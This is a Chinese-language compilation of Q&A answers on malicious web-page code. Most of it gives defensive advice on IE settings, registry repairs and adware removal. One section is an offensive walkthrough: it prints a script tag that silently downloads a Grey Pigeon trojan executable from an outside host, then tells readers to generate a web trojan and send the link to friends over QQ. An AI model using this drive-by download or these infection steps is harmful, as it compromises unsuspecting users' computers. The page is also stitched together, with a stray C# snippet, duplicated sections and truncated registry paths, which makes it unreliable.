网页恶意代码通常利用
呵呵,现在网站挂马可以直接通过HTTP80端口,因此即使你的服务器安全性再高,专也不可能关属闭80端口吧?只有通过设置用户权限来避免,如果是Win2003,可以设置网站页面的用户Users组“拒绝写入”,可以有效防止挂马。另外要注意你的服务器中某些网站是否有带有评论或者留言版?这些板块都可以为黑客留下测试空间,你打开其中留言版查看是否有乱码就知道了。另外网站挂马一旦发生,往往页面数量众多,如果没有清除干净,就会导致反复挂马,因此必须在全站范围内搜索所有页面来彻底清除恶意代码。还有通过分析日志可以发现一些相对固定的攻击地址予以屏蔽也能改善你的网站情况。
Ⅱ 网页恶意代码通常利用什么来实现植入并进行攻击
if (myreader.HasRows)
答{
MessageBox.Show(myreader.GetString("email") );
}
}
myreader.Close();
mycon.Close();
Ⅲ 对于恶意代码的预防主要用什么和什么相结合的办法来实施
网页恶意代码防范技巧
相信不少用户都遇到过这种情况:当打开一个网页过后,就发现注册表和IE设置被修改了,这就是网页恶意代码造成的破坏,但是这种网页恶意代码有着更大的危害,很有可能在你不知的情况下下载木马,蠕虫等病毒,同时把您的个人敏感信息,如银行帐号,QQ帐号,游戏帐号泄露出去。对上网用户造成了极大的危害。
1、要避免被网页恶意代码感染,首先关键是不要轻易去一些并不信任的站点,尤其是一些带有美女图片等的网址。但是这个并不能真正防止网页恶意代码的攻击,因为这些恶意代码有可能在任何地方出现。所以也可以参考进行以下步骤的设置。
2、运行IE时,点击“工具→Internet选项→安全→ Internet区域的安全级别”,把安全级别由“中”改为“高”。网页恶意代码主要是含有恶意代码的ActiveX或Applet、 JavaScript的网页文件 ,所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以减少被网页恶意代码感染的几率。具体方案是:在IE窗口中点击“工具”→“Internet选项”,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及与Java相关全部选项选择“禁用”。但是,这样做在以后的网页浏览过程中有可能会使一些正常应用ActiveX的网站无法浏览。而对于使用Windows98的计算机用户,请打开 C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的“ActiveXComponent.class”删掉;对于使用Windows Me的计算机用户,请打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”删掉。这个也只是一种折中的方案,我们可以有其它方法(如下)来保证IE的安全。
3、一定要在计算机上安装网络防火墙,并要时刻打开“实时监控功能”。
4、设置注册表编辑器中的相关项值:
1)运行打开注册表编辑器命令regedit.exe进入注册表;
2)在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,增加名为DisableRegistryTools的DWORD值项,将其值改为“1”,即可禁止使用注册表编辑器命令regedit.exe。因为特殊原因需要修改注册表,可应用如下解锁方法:
用记事本编辑一个任意名的.reg文件,其中的内容如下:
REGEDIT4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
"DisableRegistryTools"=dword:00000000
双击运行recover.reg即可。
5、随时升级IE浏览器的补丁。
Ⅳ 恶意代码是什么
1.禁止使用电脑
现象描述:尽管网络流氓们用这一招的不多,但是一旦你中招了,后果真是不堪设想!浏览了含有这种恶意代码的网页其后果是:"关闭系统"、"运行"、"注销"、注册表编辑器、DOS程序、运行任何程序被禁止,系统无法进入"实模式"、驱动器被隐藏。
解决办法:一般来说上述八大现象你都遇上了的话,基本上系统就给"废"了,建议重装。
2.格式化硬盘
现象描述:这类恶意代码的特征就是利用IE执行ActiveX的功能,让你无意中格式化自己的硬盘。只要你浏览了含有它的网页,浏览器就会弹出一个警告说"当前的页面含有不安全的ctiveX,可能会对你造成危害",问你是否执行。如果你选择"是"的话,硬盘就会被快速格式化,因为格式化时窗口是最小化的,你可能根本就没注意,等发现时已悔之晚矣。
解决办法:除非你知道自己是在做什么,否则不要随便回答"是"。该提示信息还可以被修改,如改成"Windows正在删除本机的临时文件,是否继续",所以千万要注意!此外,将计算机上Format.com、Fdisk.exe、Del.exe、Deltree.exe等命令改名也是一个办法。
3.下载运行木马程序
现象描述:在网页上浏览也会中木马?当然,由于IE5.0本身的漏洞,使这样的新式入侵手法成为可能,方法就是利用了微软的可以嵌入exe文件的eml文件的漏洞,将木马放在eml文件里,然后用一段恶意代码指向它。上网者浏览到该恶意网页,就会在不知不觉中下载了木马并执行,其间居然没有任何提示和警告!
解决办法:第一个办法是升级您的IE5.0,IE5.0以上版本没这毛病;此外,安装金山毒霸、Norton等病毒防火墙,它会把网页木马当作病毒迅速查截杀。
4.注册表的锁定
现象描述:有时浏览了恶意网页后系统被修改,想要用Regedit更改时,却发现系统提示你没有权限运行该程序,然后让你联系管理员。晕了!动了我的东西还不让改,这是哪门子的道理!
解决办法:能够修改注册表的又不止Regedit一个,找一个注册表编辑器,例如:Reghance。将注册表中的HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值"DisableRegistryTools"键值恢复为"0",即可恢复注册表。
5.默认主页修改
现象描述:一些网站为了提高自己的访问量和做广告宣传,利用IE的漏洞,将访问者的IE不由分说地进行修改。一般改掉你的起始页和默认主页,为了不让你改回去,甚至将IE选项中的默认主页按钮变为失效的灰色。不愧是网络流氓的一惯做风。
解决办法:1.起始页的修改。展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中将"Start Page"的键值改为"about:blank"即可。同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中将"Start Page"的键值改为"about:blank"即可。
注意:有时进行了以上步骤后仍然没有生效,估计是有程序加载到了启动项的缘故,就算修改了,下次启动时也会自动运行程序,将上述设置改回来,解决方法如下:
运行注册表编辑器Regedit.exe,然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键,然后将下面的"registry.exe"子键(名字不固定)删除,最后删除硬盘里的同名可执行程序。退出注册编辑器,重新启动计算机,问题就解决了。
2.默认主页的修改。运行注册表编辑器,展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\,将Default-Page-URL子键的键值中的那些恶意网站的网址改正,或者设置为IE的默认值。
3.IE选项按钮失效。运行注册表编辑器,将HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel中的DWORD值"Settings"=dword:1、"Links"=dword:1、"SecAddSites"=dword:1全部改为"0",将HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值"homepage"的键值改为"0"。
6.篡改IE标题栏
现象描述:在系统默认状态下,由应用程序本身来提供标题栏的信息。但是,有些网络流氓为了达到广告宣传的目的,将串值"Windows Title"下的键值改为其网站名或更多的广告信息,从而达到改变IE标题栏的目的。非要别人看他的东西,而且是通过非法的修改手段,除了"无耻"两个字,再没有其它形容词了。
解决办法:展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\下,在右半部分窗口找到串值"Windows Title",将该串值删除。重新启动计算机。
7.篡改默认搜索引擎
现象描述:在IE浏览器的工具栏中有一个搜索引擎的工具按钮,可以实现网络搜索,被篡改后只要点击那个搜索工具按钮就会链接到网络注氓想要你去的网站。
解决办法:运行注册表编辑器,依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant,将CustomizeSearch及SearchAssistant的键值改为某个搜索引擎的网址即可。
8.IE右键修改
现象描述:有的网络流氓为了宣传的目的,将你的右键弹出的功能菜单进行了修改,并且加入了一些乱七八糟的东西,甚至为了禁止你下载,将IE窗口中单击右键的功能都屏蔽掉。
解决办法:1.右键菜单被修改。打开注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,删除相关的广告条文。
2.右键功能失效。打开注册表编辑器,展开到HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,将其DWORD值"NoBrowserContextMenu"的值改为0。
9.篡改地址栏文字
现象描述:中招者的IE地址栏下方出现一些莫名其妙的文字和图标,地址栏里的下拉框里也有大量的地址,并不是你以前访问过的。
解决办法:1.地址栏下的文字。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ToolBar下找到键值LinksFolderName,将其中的内容删去即可。
2.地址栏中无用的地址。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypeURLs中删除无用的键值即可。
10.启动时弹出对话框
现象描述:1.系统启动时弹出对话框,通常是一些广告信息,例如欢迎访问某某网站等等。2.开机弹出网页,通常会弹出很多窗口,让你措手不及,恶毒一点的,可以重复弹出窗口直到死机。
解决办法:1.弹出对话框。打开注册表编辑器,找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon主键,然后在右边窗口中找到"LegalNoticeCaption"和"LegalNoticeText"这两个字符串,删除这两个字符串就可以解决在启动时出现提示框的现象了。
2.弹出网页。点击"开始-运行-输入msconfig",选择"启动",把里面后缀为url、html、htm的网址文件都勾掉。
11.IE窗口定时弹出
现象描述:中招者的机器每隔一段时间就弹出IE窗口,地址指向网络注氓的个人主页。不晓得是不是网络流氓以为这样你就会经常光顾?
解决办法:点击"开始-运行-输入msconfig",选择"启动",把里面后缀为hta的都勾掉,重启。
Ⅳ 如何查找网页恶意代码
Linux服务器上怎么用iScanner删除网页恶意代码?这篇文章主要介绍了Linux服务器上用iScanner删除网页恶意代码的方法,iScanner为Ruby编写,所以服务器上要首先安装Ruby解释器,需要的朋友可以参考下 第一步:安装 首先要确保服务器上已经安装了Ruby 代码如下: #ruby -v //查看ruby的版本信息 如果服务器上没有安装,可以通过yum或者apt-get安装ruby(根据自己服务器系统选择对应的方法安装) 代码如下: #yum install ruby //centos用yum安装 #apt-get install ruby //ubantu用apt-get安装 iScanner不需要额外的库,且不需要安装,但是作者还是做了个安装和卸载脚本,让我们可以可以通过下面的命令安装和卸载 iScanner 代码如下: # -F 用这个参数扫描指定的文件。 # iscanner -F /home/user/file -o 这个参数允许你将扫描的日志文件保存为特定的地方和特定的文件名,如果未指定这个参数,默认感染日志文件的格式为"infected-[TIME]-[DATE] -c 用这个参数,可以删除受感染文件中的恶意代码,而不删除受感染的文件。当你用这个参数的时候,最好查看日志文件,以确保iscanner将会从哪些文件中删除恶意代码。 # iscanner -c infected.log -b 这个参数可以让iscanner保在删除恶意代码之前备份受感染的文件,默认备份的文件名为"backup-[TIME]-[DATE]". # iscanner -b -c infected.log -r 这个参数可以让我们从备份的文件中恢复被删除的文件 # iscanner -r backup/ -a 这个参数可以让iscanner自动清除所有受感染的文件。这个参数可能会很危险,当你没有先扫描文件或你不知道会产生何种结果。 # iscanner -f /home/user -a -D 这个参数可以让iscanner在调试模式下运行,这个参数在你遇到问题问题是后将会很有用。 # iscanner -f /home/user -D -q 如果你不想看到任何iscanner的输出信息,就可以用这个命令让iscanner在安静模式下运行 # iscanner -f /home/user -q -s 这个参数可以让我们将受感染的文件交给iscanner的开发者分析,以改进和升级恶意代码特征库 # iscanner -s /home/user/malicious_file.html -U 这个参数可以用来升级iscanner和恶意代码特征库 # iscanner -U -u 这个参数用来升级恶意代码特征库而不升级iscanner # iscanner -u -v 这个参数用来查询打印输出iscanner的版本和恶意代码特征库的版本号。 # iscanner -v -h 这个参数可以查询help帮助信息。 # iscanner -h 数据库特征 代码如下: - - 0.0 - (REGULAR EXPRESSION) - Signature comment. - * 第一行是特征的id '0.0'. *选项参数: MU --> 多行正则表达式。 LN --> 一行正则表达式。 RE -->用正则表达式扫描远程的或者本地的文件。 LO -->用正则表达式只扫描本地文件。 工具开发者的一些提示信息和建议: *你可以轻松的修改恶意代码特征库的正则表达式 *如果你的几个网扎都被入侵了,你可以添加特征到特征库让iscanner扫描所有被感染的文件 *你可以将iscanner放到crontab中定时扫描你的 文件,并将扫描结果发到你指定的邮件,多方便哈! *你可以配置你的ftp服务器使得iscanner扫描所有上传的文件,并且如果有受感染的文件,则发送扫描记录到指定文件报警,通知管理员。
Ⅵ 网站恶意代码什么意思
1、要避免被网页恶意代码感染,首先关键是不要轻易去一些并不信任的站点,尤其是一些带有美女图片等的网址。但是这个并不能真正防止网页恶意代码的攻击,因为这些恶意代码有可能在任何地方出现。所以也可以参考进行以下步骤的设置。
2、运行IE时,点击“工具→Internet选项→安全→ Internet区域的安全级别”,把安全级别由“中”改为“高”。网页恶意代码主要是含有恶意代码的ActiveX或Applet、 JavaScript的网页文件 ,所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以减少被网页恶意代码感染的几率。具体方案是:在IE窗口中点击“工具”→“Internet选项”,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及与Java相关全部选项选择“禁用”。但是,这样做在以后的网页浏览过程中有可能会使一些正常应用ActiveX的网站无法浏览。而对于使用Windows98的计算机用户,请打开 C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的“ActiveXComponent.class”删掉;对于使用Windows Me的计算机用户,请打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”删掉。这个也只是一种折中的方案,我们可以有其它方法(如下)来保证IE的安全。
3、一定要在计算机上安装网络防火墙,并要时刻打开“实时监控功能”。
4、设置注册表编辑器中的相关项值:
1)运行打开注册表编辑器命令regedit.exe进入注册表;
2)在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,增加名为DisableRegistryTools的DWORD值项,将其值改为“1”,即可禁止使用注册表编辑器命令regedit.exe。
因为特殊原因需要修改注册表,可应用如下解锁方法:
用记事本编辑一个任意名的.reg文件,其中的内容如下:
REGEDIT4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
"DisableRegistryTools"=dword:00000000
双击运行recover.reg即可。
5、随时升级IE浏览器的补丁。
Ⅶ 如何禁止网页恶意代码的入侵求答案
网页恶意代码入侵如何禁止呢?首先我们要知道恶意代码的工专作原理,我们知道网页上所属看到的都是表像,其内在实质就是一行一行的代码,浏览器就是靠着看这些代码来为我们呈现绚烂多彩的网页的。那么只要在这些正常的代码中间加入几段特意编的恶意代码,那么网页就成了具有破坏力的恶意网页了。因此要避免网页恶意代码的攻击只要禁止这些恶意代码的运行就可以了。
打开IE浏览器,依次点击工具菜单下的Internet选项,选择安全标签,点击自定义级别按钮,在弹出的新对话框中把安全级别定义为高,ActiveX控件和插件中的第二项对标记为可安全执行脚本的ActiveX控件执行脚本和第三项对未标记为可安全执行脚本的ActiveX控件初始化并执行脚本设置为禁用,这两项禁止之后,所有网页上的基于ActiveX的恶意代码都被禁止执行,遇到有恶意代码的网页也就不怕了。
这是一个很实用的方法吧,按照这个方法设置一下,你再看一些网页时,就不会有那些恶意软件一个个弹出来了,也就不用烦心了,只管保持好心情上网遨游。
Ⅷ 网页恶意代码有几种解决方法!!
CNNIC中文上网为什么流氓软件总是杀不掉
释放文件及文件夹
C:\Program Files\CNNIC
%system%\drivers\cdnprot.sys
%system%\drivers\cdntran.sys
%system%\drivers\gciecfgg.sys
gciecfgg.sys这个是随机的,删除后,还会再生产一个sys文件
%system%\cdnns.dll
%system%\cdn.dll
%system%\CDNprot.dat
添加或修改注册表信息
[HKEY_LOCAL_MACHINE\SOFTWARE]
CNNIC
[HKEY_CURRENT_USER\Software]
CNNIC
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt]
访问通用网址
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions]
CDNCLIENT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}
[HKEY_CLASSES_ROOT]
CdnForIE.IEHlprObj
[HKEY_CLASSES_ROOT\CLSID]
{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions]
{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[CdnCtr C:\Program Files\CNNIC\Cdn\cdnup.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
CdnClient
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services]
cdnprot
cdntran
gciecfgg
注意:
1、在未处理掉cdnprot.sys之前,大部分的注册表操作或删除文件操作,都不会有很好的效果
2、CNNIC的几个dll文件则插入到N个进程当中
3、运行IceSword,则会立即重启,应该是对IceSword做了防范
解决过程:
由于昨天太晚,一时心烦,没有用手工来处理
1、使用CNNIC自带的卸载程序先卸载
2、再用360安全卫士、恶意软件清理助手等轮番扫荡
3、还有一些残尸,手工删除掉
PS:
经过上述依然搞之不定的,重点注意
%system%\drivers\cdnprot.sys
%system%\drivers\cdntran.sys
以及它们在注册表里的位置
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services]
Ⅸ 恶意代码的基本原理
首先明确,恶意代码实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了有恶意代码的网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://go163go.vicp.net/1.exe"></SCRIPT>
小提示:代码说明
a. 代码中“src”的属性为程序的网络地址,本例中“http://go163go.vicp.net/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。
把这段代码插入到网页源代码的</BODY>…</BODY>之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录<Temporary Internet Files>,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。
二、网页木马的基本用法
理解了网页木马攻击的原理,我们可以制作自己的网页木马,但这需要你根据IE漏洞写出利用代码。实际上,在网上有很多高手已写出了一些漏洞的利用代码,有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索,你会发现,在网上有很多利用IE的各种漏洞编写的网页木马生成器,它们大都为可视化的程序,只要你有一个木马(该木马必须把它放置到网络上),利用这些生成器你就可以立即生成一个网页,该网页就是网页木马,只要他人打开这个网页,该网页就可以自动完成下载木马并运行(安装)木马的过程。
在我的电脑上我已下载了一个网页木马生成器,下面我们来看怎么生成网页木马并让他人中木马。
第一步:启动该网页木马生成器,如图4所示,在文本框中输入木马的网络地址,最后单击“生成”。
图4 网页木马生成器
第二步:在网页木马生成器的安装文件夹会生成一个网页文件,该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或免费主面空间。
现在好了,把上述网页在服务器上的地址(网址)通过QQ发给自己的好友,一旦他访问了该网页,该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。
现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧!实际上,即使人人都不打开陌生人发来的网址,也仍然有一些人“飞蛾补灯,自寻死路”,因为若大的Internet,总会有一些人会有意或无意地访问这些网址,而且,有些网页木马,还挂在一些知名网站上(根据知名网站的访问量,你算算吧,每天有多少人中了木马!)。
小提示:你可能还没想到,看电影,在论坛查看或回复帖子也能中木马。实际上,网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上,这样,用户一旦观看电影、查看或预览邮件(主要是一些用电子邮件群发器发送的垃圾邮件)、参与帖子,打开电子书,用户就会中网页木马。
Ⅹ 网页恶意代码危害有哪些这些危害怎么解决
(一)如何在注册表被锁定的情况下修复注册表
这是由于注册表编辑器:
HKEY_CURRENT_下的DWORD值“DisableRegistryTools”被修改为“1”的缘故,将其键值恢复为“0”即可恢复注册表的使用。
解决办法:
(1)可以自己动手制作一个解除注册表锁定的工具,就是用记事本编辑一个任意名字的.reg文件,比如recover.reg,内容如下:
REGEDIT4
[HKEY_CURRENT_]
"DisableRegistryTools"=dword:00000000
(二)篡改IE的默认页
有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改了。具体说就是以下注册表项被修改:
HKEY_LOCAL_ ExplorerMainDefault_Page_URL
“Default_Page_URL”这个子键的键值即起始页的默认页。
解决办法:
运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就行了,或者将其设置为IE的默认值。
(三)修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改
主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):
解决办法:
将上面这些DWORD值改为“0”即可恢复功能。
(四)IE的默认首页灰色按扭不可选
这是由于注册表HKEY_USERS. ExplorerControl Panel
下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”,被修改后为“1”(即为灰色不可选状态)。
解决办法:
将“homepage”的键值改为“0”即可。
(五)IE标题栏被修改
在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值Window Title下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。
解决办法:
①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;
②展开注册表到
HKEY_LOCAL_
ExplorerMain下,在右半部分窗口中找到串值“Window Title” ,将该串值删除即可,或将Window
Title的键值改为“IE浏览器”等你喜欢的名字;
③同理,展开注册表到
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain
然后按②中所述方法处理。
④退出注册表编辑器,重新启动计算机,运行IE,你会发现困扰你的问题被解决了!
(六)IE右键菜单被修改
解决办法:
打开注册标编辑器,找到
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMenuExt
删除相关的广告条文即可,注意不要把下载软件FlashGet和Netants也删除掉,这两个可是“正常”的,除非你不想在IE的右键菜单中见到它们。
(七)IE默认搜索引擎被修改
在IE浏览器的工具栏中有一个搜索引擎的工具按钮,可以实现网络搜索,被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改:
HKEY_LOCAL_ ExplorerSearchCustomizeSearch
HKEY_LOCAL_ ExplorerSearchSearchAssistant
解决办法:
运行注册表编辑器,依次展开上述子键,将“CustomizeSearch”和“SearchAssistant”的键值改为某个搜索引擎的网址即可。
(八)系统启动时弹出对话框
受到更改的注册表项目为:
HKEY_LOCAL_
解决办法:
打开注册表编辑器,找到
HKEY_LOCAL_
这一个主键,然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeText”这两个字符串,删除这两个字符串就可以解决在登陆时出现提示框的现象了。
(九)IE默认连接首页被修改
IE浏览器上方的标题栏被改成“欢迎访问……网站”的样式,这是最常见的篡改手段,受害者众多。
受到更改的注册表项目为:
HKEY_LOCAL_ ExplorerMainStart Page
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page
解决办法:
①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;
②展开注册表到
HKEY_LOCAL_ ExplorerMain下,在右半部分窗口中找到串值“Start Page”双击 ,将Start Page的键值改为“about:blank”即可;
③同理,展开注册表到
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain
在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。
④退出注册表编辑器,重新启动计算机,一切OK了!
特殊例子:当IE的起始页变成了某些网址后,就算你通过选项设置修改好了,重启以后又会变成他们的网址啦,十分的难缠。其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。
解决办法:运行注册表编辑器regedit.exe,然后依次展开
HKEY_LOCAL_ VersionRun
主键,然后将其下的registry.exe子键删除,然后删除自运行程序c:Program Files egistry.exe,最后从IE选项中重新设置起始页。
(十)IE中鼠标右键失效
浏览网页后在IE中鼠标右键失效,点击右键没有任何反应!
有的网络流氓为了达到其恶意宣传的目的,将你的右键弹出的功能菜单进行了修改,并且加入了一些乱七八糟的东西,甚至为了禁止你下载,将IE窗口中单击右键的功能都屏蔽掉。
解决办法:
1.右键菜单被修改。打开注册表编辑器,找到HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMenuExt,删除相关的广告条文。
2.右键功能失效。打开注册表编辑器,展开到HKEY_CURRENT_ ExplorerRestrictions,将其DWORD值"NoBrowserContextMenu"的值改为0。